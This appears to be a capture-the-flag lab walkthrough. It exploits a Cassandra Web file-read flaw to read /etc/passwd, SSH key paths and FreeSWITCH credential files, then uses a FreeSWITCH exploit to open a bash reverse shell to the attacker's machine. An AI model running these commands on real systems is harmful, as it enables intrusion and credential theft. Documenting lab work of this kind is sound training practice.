Cassandra Web 3000 [Initial]

I found that cassandra web is hosted on port 3000.

Found one exploit related to this. This exploit is realted to Remote file read.

Cassandra Web 0.5.0 - Remote File ReadExploit Database

Exploiting for ssh key

searchsploit -m 49362

checking for help.

python3 49362.py

Trying to read /etc/passwd file.

python3 49362.py -p 3000 $clue "/etc/passwd"

This worked.!!!

We can see that SSH port is open let's check for sshd config file.

python3 49362.py -p 3000 $clue "/etc/ssh/ssh_config"

No user is restricted to use SSH service.

Let's check for ssh key in user's home directory one by one.

Making list:

python3 49362.py -p 3000 $clue "/etc/passwd" > passwd_list.txt

Make a list of user present

awk -F: '($3 == 0 || $3 >= 1000) {print $6}' passwd_list.txt > user_list.txt

Make list of Names of SSH files in linux

echo "/.ssh/id_rsa\n/.ssh/id_rsa.keystore\n/.ssh/id_rsa.pub\n/.ssh/authorized_keys\n/.ssh/known_hosts\n/.ssh/id_ecdsa\n/.ssh/id_ecdsa.pub\n/.ssh/id_ed25519\n/.ssh/id_dsa" > ssh_key.txt

Checking for SSH Key


# Directly run the script in the terminal, It will store all result in file named as result_ssh.txt
while read -r user; do
    while read -r key; do
        echo "\n=====\n" >> result_ssh.txt
        echo "$user$key" >> result_ssh.txt
        python3 49362.py -p 3000 $clue "$user$key"
    done < ssh_key.txt
done < user_list.txt

# You have to modify the script according to the situation and need.
# Check for SSH key in file.

Didn't get any SSH key.

Command example:

In the exploit, I can see that there is command example:

 cassmoney.py 10.0.0.5 /proc/self/cmdline

Let's run this and check if we can get the password.

I got the password.

-u cassie 
-p SecondBiteTheApple330

Let's try to SSH using this.

ssh cassie@$clue

This didn't work.

Checked Default password file of freeSwitch

After doing google, I found that the default file for storing passwords is /etc/freeswitch/autoload_configs/event_socket.conf.xml for freeswitch.

# Let's get its content from the vulnerability of the file read.
python3 49362.py -p 3000 $clue "/etc/freeswitch/autoload_configs/event_socket.conf.xml"

I found the default Credential of FreeSwitch so, I use the exploit related to this.

FreeSWITCH 1.10.1 - Command ExecutionExploit Database

Run the exploit.

It's working.

Let's check shell from this.

sudo rlwrap -cAr nc -lnvp 80

python3 47799.py $clue "bash -c \"bash -i >& /dev/tcp/$IP_KALI/80 0>&1\""

Got the shell.

Stabalize the shell.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

Previousfreeswitch NextPrivilege escalation

Last updated 1 year ago

hashtagExploiting for ssh key

hashtagCommand example:

hashtagChecked Default password file of freeSwitch

Exploiting for ssh key

Command example:

Checked Default password file of freeSwitch